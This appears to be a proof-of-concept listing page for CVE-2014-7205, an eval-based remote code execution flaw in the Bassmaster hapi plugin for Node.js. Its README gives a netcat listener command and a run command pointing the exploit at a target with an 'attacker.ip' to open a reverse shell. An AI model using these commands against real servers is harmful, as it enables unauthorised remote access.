CVE-2014-7205 PoC — hapi server framework for Node.js bassmaster插件代码注入漏洞

Source

Associated Vulnerability

Description

Bassmaster Plugin NodeJS RCE

Readme

# Bassmaster NodeJS Plugin RCE PoC 

 bassmaster-rce.py: A Python script to exploit CVE-2014-7205.
 nodeshell.py: A Python module to generate a reverse shell for NodeJS 

**!!Only use against servers on which you have permission to test**

## Summary
 CVE-2014-7205 is a Remote Code Execution vulnerability in Bassmaster Plugin for
 NodeJS. All versions <= 1.5.1 are affected. The vulnerability exist within the
 lib/batch.js file in the internals.batch function where a call to eval() uses
 improperly escaped user input (basically the regex doesn't check if the requests
 contains malicious code).

## Proof of Concept
1. Download or clone git repo
2. Open a netcat listener in bash terminal 
   `nc -lvp 4444`
3. Make sure bassmaster-rce.py and nodeshell.py are in the same folder
4. Run bassmaster-rce.py 
   `python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444`

## Other
* nodeshell.py is fully portable to other PoCs and Exploits using python which 
also need to generate a reverse shell for NodeJS

File Snapshot

 [4.0K]  /data/pocs/745bd64795c9ee1dbd641355db10f4e6dbf9a344
├── [3.6K]  bassmaster-rce-poc.py
├── [3.8K]  nodeshell.py
├── [4.0K]  __pycache__
│   └── [1.9K]  nodeshell.cpython-38.pyc
└── [1.0K]  README.md

1 directory, 4 files

Remarks